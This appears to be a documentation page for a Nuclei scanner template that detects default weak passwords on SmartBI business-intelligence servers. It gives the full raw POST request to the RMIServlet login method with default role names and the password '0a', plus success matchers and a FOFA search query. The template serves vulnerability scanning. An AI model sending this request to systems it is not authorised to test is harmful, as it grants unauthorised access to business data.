Skip to content

SmartBI - Default Login

ID: smartbi-default-login

Severity: high

Author: SleepingBag945

Tags: smartbi,default-login

Smartbi Default User Weak Password were discovered.

id: smartbi-default-login
info:
name: SmartBI - Default Login
author: SleepingBag945
severity: high
description: |
Smartbi Default User Weak Password were discovered.
reference:
- https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247491565&idx=1&sn=eb2af62a72167c6f82ae8ec3db878511
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-default-user-weakpass.yaml
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 2
fofa-query: app="SMARTBI"
tags: smartbi,default-login
http:
- raw:
- |
POST {{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
className=UserService&methodName=loginFromDB&params=["{{role}}","0a"]
payloads:
path:
- /smartbi/vision/RMIServlet
- /vision/RMIServlet
role:
- system
- service
- public
attack: pitchfork
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"result":true'
- '"retCode":0'
condition: and
- type: word
part: header
words:
- 'text/plain'
- type: status
status:
- 200
# digest: 4a0a00473045022058a47c32572b522e63c970a47aab6006ffed25132b52d58852d897716a191d3902210080d16164bc6af8d8523d2a4b7ec8c4d295db9a2fae1eb424e4b3f3487bb3c049:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/smartbi/smartbi-default-login.yaml"

View on Github